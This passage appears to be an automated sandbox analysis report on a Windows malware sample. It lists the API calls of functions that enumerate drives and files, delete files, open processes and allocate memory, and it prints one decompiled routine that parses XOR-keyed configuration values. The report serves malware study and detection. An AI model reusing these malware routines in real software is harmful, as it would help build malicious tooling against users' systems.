                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memcpymemset$FreeHeap
                • String ID:
                • API String ID: 3053036209-0
                • Opcode ID: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction ID: 92e6ad518ecce88ee8ef6c779399bf8e77dca785d96f01d69fa3e9df480d009e
                • Opcode Fuzzy Hash: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction Fuzzy Hash: C2E08C3744512AF6CB122A94DC00DEFBF9C9F636A0F048021FE488A208E626C650B3E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CF607 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046CF611
                  • Part of subcall function 046DA2DD: RegOpenKeyExA.KERNELBASE(046CF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,046CF629,80000001,?,046DE99E), ref: 046DA324
                  • Part of subcall function 046DA2DD: RegOpenKeyExA.ADVAPI32(046CF629,046CF629,00000000,00020019,80000001,?,046CF629,80000001,?,046DE99E), ref: 046DA33A
                  • Part of subcall function 046DA2DD: RegCloseKey.ADVAPI32(80000001,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001,?,046DE99E), ref: 046DA383
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Open$Closememset
                • String ID:
                • API String ID: 1685373161-0
                • Opcode ID: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction ID: d6af40eb920e02627f9ad4ea6630b109127651311f6888dd793ec43471bda2b8
                • Opcode Fuzzy Hash: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction Fuzzy Hash: D8E08C31200108B7EB10AE81C801FA87714DF44248F008018BE095A682EA32F660D6D4
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 046DD39D Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                  • Part of subcall function 046CB5C2: ExpandEnvironmentStringsW.KERNEL32(046C1BC3,00000000,00000000,00000001,00000000,00000000,?,046C1BC3,00000000,?,?,?,7673D3B0,?,74E05520), ref: 046CB5D9
                  • Part of subcall function 046CB5C2: ExpandEnvironmentStringsW.KERNEL32(046C1BC3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,046C31AF,?,?,?), ref: 046CB5F3
                • lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                • lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                • memset.NTDLL ref: 046DD43D
                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                • lstrlenW.KERNEL32(0000002C), ref: 046DD490
                • lstrlenW.KERNEL32(?), ref: 046DD498
                • memset.NTDLL ref: 046DD4BB
                • wcscpy.NTDLL ref: 046DD4CD
                • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 046DD4F3
                • RtlEnterCriticalSection.NTDLL(?), ref: 046DD528
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046DD544
                • FindNextFileW.KERNEL32(?,00000000), ref: 046DD55D
                • WaitForSingleObject.KERNEL32(00000000), ref: 046DD56F
                • FindClose.KERNEL32(?), ref: 046DD584
                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD598
                • lstrlenW.KERNEL32(0000002C), ref: 046DD5BA
                • FindNextFileW.KERNEL32(?,00000000), ref: 046DD630
                • WaitForSingleObject.KERNEL32(00000000), ref: 046DD642
                • FindClose.KERNEL32(?), ref: 046DD65D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                • String ID:
                • API String ID: 2962561936-0
                • Opcode ID: 816b1c21d074393561604dfb6a453a34aba0f8c3859ead5f2bb27e9ca6d4576d
                • Instruction ID: 76fa2f01df655fd9e7540937848489b631da06512f308b855b0ff34f3e0d8ef9
                • Opcode Fuzzy Hash: 816b1c21d074393561604dfb6a453a34aba0f8c3859ead5f2bb27e9ca6d4576d
                • Instruction Fuzzy Hash: D8817B71904345AFD721BF25CC84A2BBBE9FF98308F04482DF5859B252E774E845CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C2D25 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                Download Yara Rule
                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2D5D
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2D8F
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2DC1
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2DF3
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2E25
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2E57
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2E89
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2EBB
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2EED
                • HeapFree.KERNEL32(00000000,?,?,?,?,74E5F710,00000000,00000000), ref: 046C3080
                • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,74E5F710,00000000,00000000), ref: 046C3124
                  • Part of subcall function 046CC5D9: RtlAllocateHeap.NTDLL ref: 046CC61A
                  • Part of subcall function 046CC5D9: memset.NTDLL ref: 046CC62E
                  • Part of subcall function 046CC5D9: GetCurrentThreadId.KERNEL32 ref: 046CC6BB
                  • Part of subcall function 046CC5D9: GetCurrentThread.KERNEL32 ref: 046CC6CE
                  • Part of subcall function 046E31D0: RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E31D9
                  • Part of subcall function 046E31D0: HeapFree.KERNEL32(00000000,?), ref: 046E320B
                  • Part of subcall function 046E31D0: RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E3229
                • HeapFree.KERNEL32(00000000,?,?,?,?,74E5F710,00000000,00000000), ref: 046C30CC
                  • Part of subcall function 046DED70: lstrlen.KERNEL32(00000000,7673D3B0,?,00000000,046C32A8,00000000,74E5F710,00000000,00000000), ref: 046DED79
                  • Part of subcall function 046DED70: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 046DED9C
                  • Part of subcall function 046DED70: memset.NTDLL ref: 046DEDAB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                • String ID:
                • API String ID: 3296958911-0
                • Opcode ID: 2a3ee075e1e4422b784c6205e543ee166e8a5c386f61b6c6dffbc5d882393a1f
                • Instruction ID: d4c101c3c6f2f41910bc8050090dabaf14fa38dd26bf1288ad40a9e444f23105
                • Opcode Fuzzy Hash: 2a3ee075e1e4422b784c6205e543ee166e8a5c386f61b6c6dffbc5d882393a1f
                • Instruction Fuzzy Hash: A5F17CB1F10116AF9B10EF75D898D7A33E8EB28704715986DEC02EB304FA35FD429A65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C1D70 Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                Download Yara Rule
                APIs
                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 046C1DA3
                • GetLastError.KERNEL32 ref: 046C1DB1
                • NtSetInformationProcess.NTDLL ref: 046C1E0B
                • GetProcAddress.KERNEL32(?,00000000), ref: 046C1E4A
                • GetProcAddress.KERNEL32(?), ref: 046C1E6B
                • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 046C1EC2
                • CloseHandle.KERNEL32(?), ref: 046C1ED8
                • CloseHandle.KERNEL32(?), ref: 046C1EFE
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                • String ID:
                • API String ID: 3529370251-0
                • Opcode ID: 9a87b4d90decb7fa58259e760098ae12a19aa037ef0c847187bdfb72339bd38f
                • Instruction ID: b45c74fa9c63e92cd9064480ea0bf9bf1b695647595f8f916a7128c61ec366ae
                • Opcode Fuzzy Hash: 9a87b4d90decb7fa58259e760098ae12a19aa037ef0c847187bdfb72339bd38f
                • Instruction Fuzzy Hash: BA418C70204342DFD7109F65D848AAABBE4FB89348F00092DF554D7251F775EA45CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DFD82 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                Download Yara Rule
                APIs
                • wcscpy.NTDLL ref: 046DFDB6
                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 046DFDC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DFDD3
                • memset.NTDLL ref: 046DFDF0
                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 046DFDFE
                • WaitForSingleObject.KERNEL32(00000000), ref: 046DFE0C
                • GetDriveTypeW.KERNEL32(?), ref: 046DFE1A
                • lstrlenW.KERNEL32(?), ref: 046DFE26
                • wcscpy.NTDLL ref: 046DFE38
                • lstrlenW.KERNEL32(?), ref: 046DFE52
                • HeapFree.KERNEL32(00000000,?), ref: 046DFE6B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                • String ID:
                • API String ID: 3888849384-0
                • Opcode ID: 7728703e9ba519aa0902ad191eb0f5482625bf2b25cee3f4c7cd7bdc15fa6074
                • Instruction ID: f7697183547496f4c67f96506e2a6ea69e1fe205a8a0d2abb8369063ca08fc0c
                • Opcode Fuzzy Hash: 7728703e9ba519aa0902ad191eb0f5482625bf2b25cee3f4c7cd7bdc15fa6074
                • Instruction Fuzzy Hash: D1311A32800119BFDB15ABA6DC88CEFBBB9FF49360B104465F105E7111FB39AA55DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C14BB3 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 93%
                			E01C14BB3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x1c1a2d4; // 0x69b25f44
				if(E01C13E4F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x1c1a330 = _v8;
				}
				_t33 =  *0x1c1a2d4; // 0x69b25f44
				if(E01C13E4F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x1c1a2d4; // 0x69b25f44
				_push(_t115);
				if(E01C13E4F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x1c1a290, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x1c1a2d4; // 0x69b25f44
						_t45 = E01C12ECD(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x1c1a298 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x1c1a2d4; // 0x69b25f44
						_t46 = E01C12ECD(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x1c1a29c = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x1c1a2d4; // 0x69b25f44
						_t47 = E01C12ECD(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x1c1a2a0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x1c1a2d4; // 0x69b25f44
						_t48 = E01C12ECD(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x1c1a008 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x1c1a2d4; // 0x69b25f44
						_t49 = E01C12ECD(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x1c1a030 = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x1c1a2d4; // 0x69b25f44
						_t50 = E01C12ECD(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x1c1a2a4 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x1c1a2d4; // 0x69b25f44
								_t51 = E01C12ECD(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E01C16659(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E01C13F8C();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x1c1a2d4; // 0x69b25f44
								_t52 = E01C12ECD(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E01C16659(0, _t52) != 0) {
								_t121 =  *0x1c1a384; // 0x21795b0
								E01C1219A(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x1c1a2d4; // 0x69b25f44
								_t53 = E01C12ECD(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x1c1a2d8; // 0x55d5a8
								_t22 = _t54 + 0x1c1b252; // 0x616d692f
								 *0x1c1a32c = _t22;
								goto L60;
							} else {
								_t64 = E01C16659(0, _t53);
								 *0x1c1a32c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x1c1a2d4; // 0x69b25f44
										_t56 = E01C12ECD(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x1c1a2d8; // 0x55d5a8
										_t23 = _t57 + 0x1c1b79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E01C16659(0, _t56);
									}
									 *0x1c1a3a0 = _t58;
									HeapFree( *0x1c1a290, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                0x01c14bb3
                0x01c14bb3
                0x01c14bb3
                0x01c14bb3
                0x01c14bb6
                0x01c14bd3
                0x01c14be1
                0x01c14be1
                0x01c14be6
                0x01c14c00
                0x01c14e6e
                0x01c14e75
                0x01c14e79
                0x01c14e79
                0x01c14c06
                0x01c14c0b
                0x01c14c23
                0x01c14e5b
                0x01c14e65
                0x00000000
                0x01c14c29
                0x01c14c29
                0x01c14c2a
                0x01c14c2f
                0x01c14c45
                0x01c14c31
                0x01c14c31
                0x01c14c3e
                0x01c14c3e
                0x01c14c49
                0x01c14c50
                0x01c14c52
                0x01c14c5c
                0x01c14c61
                0x01c14c61
                0x01c14c5c
                0x01c14c68
                0x01c14c7e
                0x01c14c6a
                0x01c14c6a
                0x01c14c77
                0x01c14c77
                0x01c14c82
                0x01c14c84
                0x01c14c8e
                0x01c14c93
                0x01c14c93
                0x01c14c8e
                0x01c14c9a
                0x01c14cb0
                0x01c14c9c
                0x01c14c9c
                0x01c14ca9
                0x01c14ca9
                0x01c14cb4
                0x01c14cb6
                0x01c14cc0
                0x01c14cc5
                0x01c14cc5
                0x01c14cc0
                0x01c14ccc
                0x01c14ce2
                0x01c14cce
                0x01c14cce
                0x01c14cdb
                0x01c14cdb
                0x01c14ce6
                0x01c14ce8
                0x01c14cf2
                0x01c14cf7
                0x01c14cf7
                0x01c14cf2
                0x01c14cfe
                0x01c14d14
                0x01c14d00
                0x01c14d00
                0x01c14d0d
                0x01c14d0d
                0x01c14d18
                0x01c14d1a
                0x01c14d24
                0x01c14d29
                0x01c14d29
                0x01c14d24
                0x01c14d30
                0x01c14d46
                0x01c14d32
                0x01c14d32
                0x01c14d3f
                0x01c14d3f
                0x01c14d4a
                0x01c14d5d
                0x01c14d5d
                0x00000000
                0x01c14d4c
                0x01c14d4c
                0x01c14d56
                0x00000000
                0x01c14d67
                0x01c14d67
                0x01c14d69
                0x01c14d7f
                0x01c14d6b
                0x01c14d6b
                0x01c14d78
                0x01c14d78
                0x01c14d83
                0x01c14d85
                0x01c14d88
                0x01c14d89
                0x01c14d90
                0x01c14d92
                0x01c14d93
                0x01c14d93
                0x01c14d90
                0x01c14d9a
                0x01c14db0
                0x01c14d9c
                0x01c14d9c
                0x01c14da9
                0x01c14da9
                0x01c14db4
                0x01c14dc2
                0x01c14dcc
                0x01c14dcc
                0x01c14dd4
                0x01c14dea
                0x01c14dd6
                0x01c14dd6
                0x01c14de3
                0x01c14de3
                0x01c14dee
                0x01c14e01
                0x01c14e01
                0x01c14e06
                0x01c14e0c
                0x00000000
                0x01c14df0
                0x01c14df3
                0x01c14dfa
                0x01c14dff
                0x01c14e11
                0x01c14e13
                0x01c14e29
                0x01c14e15
                0x01c14e15
                0x01c14e22
                0x01c14e22
                0x01c14e2d
                0x01c14e39
                0x01c14e3e
                0x01c14e3e
                0x01c14e2f
                0x01c14e32
                0x01c14e32
                0x01c14e4c
                0x01c14e51
                0x01c14e57
                0x00000000
                0x01c14e5a
                0x00000000
                0x01c14dff
                0x01c14dee
                0x01c14d56
                0x01c14d4a

                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14C58
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14C8A
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14CBC
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14CEE
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14D20
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14D52
                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01C14E51
                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01C14E65
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: 9f0bf6660229e962624a579bd1c09231b82e887bb9d354d1fea213133da07f84
                • Instruction ID: 2e20aa88cbb809ee21957aaa01d539197fe6adc532f2d758d8269eb092e62d85
                • Opcode Fuzzy Hash: 9f0bf6660229e962624a579bd1c09231b82e887bb9d354d1fea213133da07f84
                • Instruction Fuzzy Hash: C781C774680255EBDB25EBB8C984E9F7BE9BB6B700B640915E106D310DEB36D604FB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB190 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4BB
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4D8
                • FreeLibrary.KERNEL32(?), ref: 046CB2C6
                  • Part of subcall function 046CD95E: lstrlenW.KERNEL32(?,00000000,?,?,?,046CB20B,?,?), ref: 046CD96B
                  • Part of subcall function 046CD95E: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,046CB20B,?,?), ref: 046CD994
                  • Part of subcall function 046CD95E: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 046CD9B4
                  • Part of subcall function 046CD95E: lstrcpyW.KERNEL32(-00000002,?), ref: 046CD9CF
                  • Part of subcall function 046CD95E: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9DB
                  • Part of subcall function 046CD95E: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,046CB20B,?,?), ref: 046CD9DE
                  • Part of subcall function 046CD95E: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9EA
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA07
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA21
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA37
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA4D
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA63
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA79
                • FindFirstFileW.KERNEL32(?,?,?,?), ref: 046CB21C
                • lstrlenW.KERNEL32(?), ref: 046CB238
                • lstrlenW.KERNEL32(?), ref: 046CB250
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpyW.KERNEL32(00000000,?), ref: 046CB269
                • lstrcpyW.KERNEL32(00000002), ref: 046CB27E
                  • Part of subcall function 046E5B2E: lstrlenW.KERNEL32(?,00000000,74E48250,74E069A0,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B3E
                  • Part of subcall function 046E5B2E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B60
                  • Part of subcall function 046E5B2E: lstrcpyW.KERNEL32(00000000,?), ref: 046E5B8C
                  • Part of subcall function 046E5B2E: lstrcatW.KERNEL32(00000000,?), ref: 046E5B9F
                • FindNextFileW.KERNEL32(?,00000010), ref: 046CB2A6
                • FindClose.KERNEL32(00000002), ref: 046CB2B4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                • String ID:
                • API String ID: 1209511739-0
                • Opcode ID: dfec0531100968008ebecdaaba3813e3f856f22b10be5d821bf233f4af65b1f6
                • Instruction ID: af7205e71675a5bc09d13fad313079669d72f420fed279aaf9d7c358944027b2
                • Opcode Fuzzy Hash: dfec0531100968008ebecdaaba3813e3f856f22b10be5d821bf233f4af65b1f6
                • Instruction Fuzzy Hash: 2B4148314043069FD710EF61EC49A7FBBE8FB84B09F04092DF58496250EB39E908CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB2F7 Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00000000), ref: 046CB30F
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 046CB378
                • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 046CB3A0
                • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 046CB3F2
                • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 046CB3FD
                • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 046CB410
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                • String ID:
                • API String ID: 499515686-0
                • Opcode ID: 718b6f70848567fddaffa8979db01b0778f445720458a5292a30d0a012904690
                • Instruction ID: f5f2a450955be92f6dd7350d6b69c8e85ae9be3b373c5d0bf7d6a0c72b75b867
                • Opcode Fuzzy Hash: 718b6f70848567fddaffa8979db01b0778f445720458a5292a30d0a012904690
                • Instruction Fuzzy Hash: 4F414870900209EFDF10AFA1EC49ABE7BB9FF10744F508069EA01A7150F774BA44DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D630F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046D6331
                  • Part of subcall function 046E3E7D: NtAllocateVirtualMemory.NTDLL(046D6359,00000000,00000000,046D6359,00003000,00000040), ref: 046E3EAE
